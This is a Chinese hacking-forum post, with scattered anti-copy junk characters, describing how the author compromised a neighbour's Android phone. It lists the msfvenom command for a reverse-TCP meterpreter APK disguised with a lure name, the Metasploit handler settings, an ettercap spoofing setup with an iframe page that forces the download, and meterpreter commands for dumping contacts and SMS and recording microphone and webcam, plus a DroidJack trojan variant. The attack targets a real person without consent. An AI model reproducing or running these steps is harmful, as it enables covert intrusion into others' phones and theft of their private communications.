找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 metasploit+ettercap中间人攻击成功入侵邻居手机
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1450|回复: 0
打印 上一主题 下一主题

metasploit+ettercap中间人攻击成功入侵邻居手机

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2018-10-20 20:30:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

* W0 B, {. }/ z% A6 e" j 五、msf+ettercap入侵邻居安卓手机 8 C8 A7 e4 a5 E8 \% F1 G5 v

* s8 }4 ^4 p3 q) c- s

# q, ^6 B& X! _8 o1 G 首先启动msf ; @: d; G7 [ p5 r4 m

0 z$ r2 @9 l6 E: o6 V

. F. ]' [/ |; a' V# D. R1 o2 j( ` 先用kali生成一个安卓木马,如下命令: & H7 P, Q* @4 n9 N1 ?$ F

: l; K! o4 M J2 n

2 a3 d7 m9 k: l0 Q! c7 @ Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk % i7 M( a q, c8 A+ {

; a1 {' T& e7 ?) X+ X

_) c6 J5 f. ?8 t U4 N 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 # i! O' L) L8 Z3 ^; n. P% p" t% s

$ U$ h9 w6 r# {: s7 q5 [

& c5 g* O2 u- e. r' B/ Q' Z 然后进入msf ) O v( b# {2 i

, d+ R# k2 V/ w& [4 y/ r3 N

' x' \8 i; t. S, S& L1 l$ ?; _4 E use exploit/multi/handler + e- t( X" b$ Y+ r* w

( t6 ?2 m2 X7 O* L4 W) q

+ t8 g- ~6 p8 N- i4 b# }, Y set payload android/meterpreter/reverse_tcp " S1 ^: Z" w& I5 t8 i5 D

4 p% Z. Q2 R+ x' r5 \& W* o; J

+ k5 O" m2 y' B0 ]$ \ set LHOST 192.168.0.109 //ipkailiip - i% B+ {$ @) [) N4 n

9 }/ a" b4 n1 `4 J1 N( C

: |2 v: @6 S' d( U, J set LPORT 44444 //端口一定要与前面生成的木马的端口一致 A( {6 u. r' m7 t

7 p; Z1 B( a) \

* z7 n7 O5 D4 P7 k Exploit * Y1 [% X7 |1 c/ K; B

" R& F$ _/ H( U* {- C! m y

. t! g0 o4 w3 ?   9 s3 q2 Y! |' _2 p8 h

" F5 W; s& u# E# o3 Z4 @

( Z) t" p6 }+ _. g+ j( P$ I6 G 下面我们开启ettercap -G + } y- j1 A0 ]9 i6 l

( |! O# w1 v R$ r0 j% p: D; e

$ Y( r, ~9 o X( a 我物理IP . V& w* V% a& J

+ ^; v: K4 H+ |% {# F4 \1 A

% R8 y) C: B: o t   x6 u) `0 E4 i

" _8 s. U5 \; M, _0 I

0 [ [ U8 @" S* H4 @# s2 j 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, 7 p6 L; e& H$ o/ \- O

% {; C) ~; c2 h+ ]& |

+ t: n1 v ]/ D' z; ], r 下面我们来设置一下 1 h; K* x5 s- v/ p9 V

l- z" D# C1 m

9 y( D! H' b5 G. A) d! ?   1 {( U9 a+ c2 X6 W5 P! P

; j4 m t' a4 n; h

/ [, r# o d7 h* @5 ` 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, - J% L! g$ |/ d, {* P

/ n+ G( h( f/ z0 ]

- j/ E* P$ \$ O1 r3 ?+ `( g   , k- p( r4 T7 \% B; N/ A8 }

. T2 u% ~# u4 v8 a2 [# N

! z {1 S6 f5 M. S   . ^9 L$ _. @: {# i# H& [. L

2 C0 C$ }8 }' X9 V) F1 D; ]. Y% N

q3 n: r$ H. _9 X+ b: ~ A' W5 o   5 X% B. b' T: a) X. ?, \

$ L5 I# _2 F+ m& ~# w' P, s5 u

" V& w" O8 C! [) r* K   3 R. y' ?! s4 O7 w7 ~3 V

2 U# ~# `( n$ k, b" Z: Z

0 |: F$ e9 I) v2 U; t) I   7 ?8 _& w6 h" N1 Q

* v& ` Z/ e$ i5 R/ C

$ `$ w% E- ~/ g& s ^3 U/ i. {% s2 c   3 n5 E) Y8 P* D

7 U6 @5 Y% M8 ?- F. ~7 m! B

$ h& u4 H; c ]+ K- r8 N& C   ( [( H6 u( Q& ?. E/ f4 z( S

7 p0 b' ~% O2 O- R

8 J+ Q+ b# g( I% C+ t+ q   ) v. Z3 W6 Q# |' `. U; a' h3 B' a

% h- S* x2 \9 R+ i+ Q

# d- @" h; {+ [( ?1 \   9 G8 T" Z* ~ z5 W& S, C; Q

5 r. P1 U5 W$ L9 C

/ d% {7 T2 c% D: }. [   ( Y$ h( M8 \6 B0 a' Y0 k; I- {

; o4 X7 `0 `; Q5 D$ {$ B6 [

( F F- N' q) T4 [+ G2 X7 V   . U* y7 `/ |2 o

% }0 H+ z+ O) [9 D/ n

' W/ I$ b/ D( X; ~5 ^0 }& ~! r/ F   7 O' @1 P& F# H M( T

0 ]) F! K/ s/ G' j7 }8 o% G

: W6 h- b9 K* w$ A3 d* s5 Q   " K( ]# m( b d9 o: s1 L" ]9 w

' X/ [+ |9 \: G2 f* N- C1 b/ b7 q4 x

" Y; l( y# t. u% O3 h1 n 下面我们开始攻击 5 t; g( M+ A. Q3 M ^, E6 h

6 \4 Q, k- W! i* R

9 r% }4 s6 z$ Q0 @' S! p   4 E( c& `( p4 r, e1 k) V

& [% }7 P, g6 Z" k" q# Z( |4 N

: m% ?" e5 I0 z   / u) e$ D5 k, W* \7 ?$ Y. u

* B. \ g* w' L& L& c1 G

8 K) Z, J( A0 A, e/ c: }" O   : k8 R" N; M0 T7 n$ Q# |

0 F V/ [4 }+ a

/ N; h, j, P: P) R9 ^   7 w" w6 B: ~3 d; d, w. a

' z- d: ?+ x1 j! ?. C

2 p) k* q1 e/ G, ]" Z; Y5 Z   3 Q3 @( \8 L+ N) o

4 `! q7 G3 n0 N9 |% p! H, S8 V

- g; H' L: I! s$ T 大概过了5分钟多,发现反弹成功了 7 A; Y" x# N; H2 w- R0 o; `8 J1 `

+ c% T9 D$ ~% X7 F$ k J) r- a

1 b$ _$ p' u; y4 w   / B, {4 W2 N, G/ o: N* L: K+ Y

, Y7 s: C' a' C* v: K

; A8 a; m% y3 s   , l0 e1 u/ v4 q" W1 Q0 T6 ~5 b

, E& X3 X( x3 ~' ^0 |" w2 r. {

* g* ~9 F* }" }, o   & _4 M" J3 D! o; w2 b

. J8 r; k0 }7 x/ }) B, b8 R

8 x1 ?8 V0 B: K7 l   ( I0 m9 {5 p8 A7 l }2 L

, J3 `( |9 p! c- A& r. F

+ W/ G5 a4 z- v# [+ ^   5 X" u$ i% d+ ^0 V2 J l/ R

U6 C8 L, _) ?, U9 @

( j* F s+ D6 A8 J   % i) {! k2 c+ U4 U# U2 Z6 @; z

# I1 n' _7 F0 V4 Z; C( i

; o0 |1 ]" e6 u: N7 C) O$ _9 M   ! q& g- S, b- m' P$ [! x

1 K( }/ v9 ?2 ]! `

2 j& i) B2 ]$ r+ x9 ?# \ 执行命令 8 y' w/ C* w2 `/ i. [7 ~+ \

, t O0 V; A9 Y1 C5 {# I+ j

7 C, z* R5 U( ~/ k( ]   ) }7 d; h: i q: o0 R5 P ?- S

% l- i2 l O4 o m# d" _. k

7 T! \8 \; g, Z5 `6 M dump_contacts    --》这个是导出电话 / Q( c) [! k% G% s' h

' _* P; h5 V1 B' z* D/ A3 S

3 v. X" e& n# l O% z4 c( \; h5 X dump_sms --》这个是导出信息 / j4 m f U9 S/ S0 N% W {8 t

6 B# I1 G7 G! X; F Y/ u4 r

& W0 o% k1 I+ W, M9 D( P record_mic     Record audio from the default microphone for X seconds / P7 E* _& e, E3 ]* @

0 x; z5 u/ y; B1 F" T

2 W K+ {- Z# ]( z; Z5 P     webcam_chat    Start a video chat 7 b) j; g5 x3 X" }9 e

! t+ }. k, [2 z7 B4 ^& a2 X3 l

. w8 p V$ _1 D2 c/ [     webcam_list    List webcams 4 S3 a) m7 p* p w) Q

$ i' V) N! Q6 R5 a

$ F/ \+ v$ z* @# ^: b) y     webcam_snap    Take a snapshot from the specified webcam 2 d8 V: \" N }" x; ^6 j+ n6 R

/ t2 B- Q3 T. ]: v& ?. c; _" [

$ O$ o& j: i5 b3 \ webcam_stream  lay a video stream from the specified webcam ! C8 [7 H" _! H

& t* ?; j3 W! |% t9 e9 S4 S

3 _! E$ ]2 x0 @( @% V2 e   ) X$ w Q" ?: W, I

, u: Y2 j9 y2 Y6 `1 C1 L- V+ f

5 t, K2 a) B4 p5 b/ H% e' S   / {5 c6 r ]# n- l2 p. g) A% j

' ^; {6 `$ n) W/ ?4 d

U5 D, a2 n# K; ^1 v% y6 q 我们打开看一下电话薄, * O) l _! f. _0 R# c

5 @$ a# R+ I) D+ c# d

1 w6 L1 F* q2 e+ `5 l4 U% b   $ n6 G4 t/ F7 o$ b

$ Q N' P" T {6 ?/ [" ^

. |6 s1 h3 `, s6 l   - z7 ]! F( g# J3 |

3 c! s" H2 X( O) Q$ g

* k" U: o9 C$ J   ' l" A8 l J3 } u/ h @

. x' N+ Q7 V4 J" T3 S/ b# f$ k0 [" C

8 x: z, G. ]* j) }% c   8 ? l2 V/ ^) n/ C8 x7 ~) ]/ e0 t! [

$ G0 Q8 V5 k' @! c8 ?! }

6 }; ]7 L/ M( J5 ]( d   % E/ z( g) c Q3 n$ w; I

' e5 f6 @8 Q- `& _7 `" C4 U: W

$ K, Q) T$ F* P# [( L   $ l6 ]/ t9 L$ K+ v/ _8 X1 X( s; X, ~

7 D7 \- Y0 F' b' Z3 g; @

' C' ?! r8 E1 {5 T9 d- d 我们同时欺骗成DroidJack木马,使用方法如图: ; @4 x0 i& r# a0 c/ K

7 W7 Z# w& B- H2 @* [# T/ ^6 k

2 f0 N* F* Q9 l4 S/ _0 y1 R   2 A9 i5 Q3 X0 w% t4 v6 y! ?

2 g) h U. v$ L! B7 A

" A) _# D% g, _9 v0 O   * d; [; S+ ^4 e4 s

: E- m3 x" H, ^: M

+ ^# f; D& n. m9 V   9 \3 |% O0 O: \7 K

9 m$ ?" V% F" h+ m

3 J2 p8 c3 S6 s- z ~ 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 ( l: y$ ~7 a. L6 n3 U: L+ R5 Y$ S! n

6 B# ]7 e5 U5 p( L

, U$ S# }& n$ h% n7 \5 p   & {( K8 R' |; e1 R1 r( [+ L/ ?* n

9 d$ C: I f$ Z0 R+ ^# M

0 U% S: X0 [6 a% K3 G   6 ?* ?2 p3 R3 z- }$ }0 Y, X

+ Z0 e) c" Z4 P2 g- s( r8 e$ D4 s

) ^5 W& D: I0 F" p% o0 d: k1 t   * O* N6 V' n! [7 c6 n0 A- W

( r+ x: \3 q: d% J

" t" N( h4 }! R6 X % X E; j P! r" m* D! {% ]

: F6 S' j( W0 z( u

8 w. \# w6 Z$ ]; H/ @" ?
8 ]) |- _) }: v/ A, J0 [) A" Z" D

回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表